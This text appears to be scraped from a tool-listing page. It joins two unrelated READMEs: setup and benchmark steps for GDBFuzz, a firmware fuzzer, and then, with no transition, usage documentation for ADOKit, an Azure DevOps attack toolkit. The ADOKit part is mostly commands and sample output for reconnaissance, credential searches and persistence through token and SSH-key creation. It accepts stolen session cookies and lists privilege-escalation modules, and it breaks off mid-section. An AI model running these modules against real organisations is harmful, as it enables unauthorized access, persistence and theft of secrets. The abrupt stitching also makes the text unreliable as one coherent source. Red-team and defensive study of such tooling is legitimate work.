./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg
Fuzzer statistics and logs are in the ./output/... directory.
Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE
Start GDB Server
./gdb_agent_console libmsp430.so
or (more stable). Build mspdebug from https://github.com/dlbeer/mspdebug/ and use:
until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done
Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*
. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.
./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg
To access USB devices as non-root user with pyusb
we add appropriate rules to udev. Paste following lines to /etc/udev/rules.d/50-myusb.rules
:
SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"
Reload udev:
sudo udevadm control --reload
sudo udevadm trigger
In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:
cut -d " " -f1 ./cfg > valid_bbs.txt
Now we can replay coverage against fuzzware result fuzzware genstats --valid-bb-file valid_bbs.txt
When crashing or hanging inputs are found, the are stored in the crashes
folder. During evaluation, we found the following three bugs:
GDBFuzz can also run on a Raspberry Pi host with slight modifications:
In file ./dependencies/ghidra/support/launch.sh:125
The JAVA_HOME
variable must be hardcoded therefore e.g. to JAVA_HOME="/usr/lib/jvm/default-java"
To fuzz software on other boards, GDBFuzz requires
src/GDBFuzz/connections
) that triggers execution of the code at the entry point e.g. serial connectionAll these properties need to be specified in the config file.
For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common
.
cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage
Next adopt the benchmark settings in benchmark/scripts/benchmark.py
and benchmark/scripts/benchmark_aflpp.py
to your demands (especially number_of_cores
, trials
, and seconds_per_trial
) and start the benchmark with:
cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
A folder appears in ./benchmark/scripts
that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs
.
GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.
On the host:
Install
sudo apt-get install graphviz
Install a recent version of node, for example Option 2 from here. Use Option 2 and not option 1. This should install both node and npm. For reference, our version numbers are (but newer versions should work too):
โ node --version
v16.9.1
โ npm --version
7.21.1
Install web UI dependencies:
cd ./src/webui
npm install
Install mosquitto MQTT broker, e.g. see here
Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:
listener 1883
allow_anonymous true
listener 9001
protocol websockets
Restart the mosquitto broker:
sudo service mosquitto restart
Check that the mosquitto broker is running:
sudo service mosquitto status
The output should include the text 'Active: active (running)'
Start the web UI:
cd ./src/webui
npm start
Your web browser should open automatically on 'http://localhost:3000/'.
Start GDBFuzz and use a user config file where enable_UI is set to True. You can use the Docker container and arduinojson SUT from above. But make sure to set 'enable_UI' to 'True'.
The nodes covered in 'blue' are covered. White nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph takes too much time if the control flow graph is large).
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
UserAuthentication
cookie on a user's machine for the .dev.azure.com
domain./credential:UserAuthentication=ABC123
/credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addbuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removebuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getserviceconnections | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
|
Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberhips
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchco de
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit-
followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmic rosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
